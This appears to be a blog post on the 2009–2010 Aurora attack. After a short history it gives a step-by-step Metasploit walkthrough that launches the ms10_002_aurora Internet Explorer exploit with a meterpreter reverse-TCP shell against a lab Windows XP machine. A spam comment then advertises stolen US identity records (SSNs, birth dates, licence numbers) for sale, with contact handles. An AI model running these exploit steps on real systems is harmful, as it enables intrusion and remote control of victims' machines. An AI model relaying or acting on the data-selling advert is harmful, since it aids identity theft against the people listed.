Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.
The attack has been aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo,Symantec, Northrop Grumman, Morgan Stanley and Dow Chemical were also among the targets.
Exploit Targets
Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8
Operating System: Windows vista, windows 7, windows server 2008
Requirement
Attacker: Kali Linux
Victim PC: Windows XP
Open terminal type msfconsole
Now type use exploit/windows/browser/ms10_002_aurora
Msf exploit (ms10_002_aurora)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_002_aurora)>set lhost 192.168.65.128 (IP of Local Host)
Msf exploit (ms10_002_aurora)>set srvhost 192.168.65.128 (This must be an address on the local machine)
Msf exploit (ms10_002_aurora)>set uripath rajesh (The Url to use for this exploit)
Msf exploit (ms10_002_aurora)>exploit
Selling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.
ReplyDelete**PRICE FOR ONE LEAD/FULLZ 2$**
All SSN's are Tested & Verified. Fresh spammed data.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
->Bulk order negotiable
->Minimum buy 25 to 30 leads/fullz
->Hope for the long term business
->You can asked for specific states too
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040